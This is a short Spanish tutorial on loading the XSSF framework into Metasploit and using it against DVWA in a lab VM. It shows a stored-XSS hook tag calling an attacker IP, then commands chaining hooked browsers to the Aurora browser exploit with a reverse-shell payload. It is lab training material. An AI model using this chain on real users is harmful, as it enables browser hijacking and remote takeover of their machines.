XSSF es un framework, creado por Ludovic Courgnaud, que nos permite “administrar” víctimas de XSS genéricos y realizar posteriores ataques, así como mantener el enlace para futuros ataques. Podemos encontrar una descripción más detallada del framework aquí.
Jugando con XSSF
Lo primero que vamos a hacer es descargar el XSSF framework desde aquíy descomprimirlo en nuestro directorio de metasploit, luego iniciamos el framework:
# Instalamos XSSF en Metasploit
cd /opt/metasploit/msf3
wget http://www.metasploit.com/redmine/attachments/596/XSSF.zip
unzip XSSF.zip
cd XSSF
cp -r data/ lib/ modules/ plugins/ ../
# Iniciamos Metasploit y cargamos el XSSF
msfconsole
load XSSF
<script src=”http://IP_BACKTRACK:8888/loop?interval=5”></script>

Ahora, desde nuestra VM Windows XP, ingresamos a DVWA, ponemos el DVWA Security en “Low” y vamos a la pestaña XSS stored. Al momento de ingresar nuestro XSS entrará en acción 😉
Regresamos a nuestra consola de metasploit y vemos las víctimas que tenemos disponibles con el comando «xssf_victims»:


use auxiliary/xssf/alert
set VictimIDs 2
set AlertMessage "Game Over"
use exploit/windows/browser/ms10_002_aurora
set SRVPORT 80
set PAYLOAD windows/shell/reverse_tcp
set LHOST IP_BACKTRACK
set URIPATH dvwa/vulnerabilities/xss_s/jobs
xssf_active_victims
xssf_exploit victimID jobID
Comentarios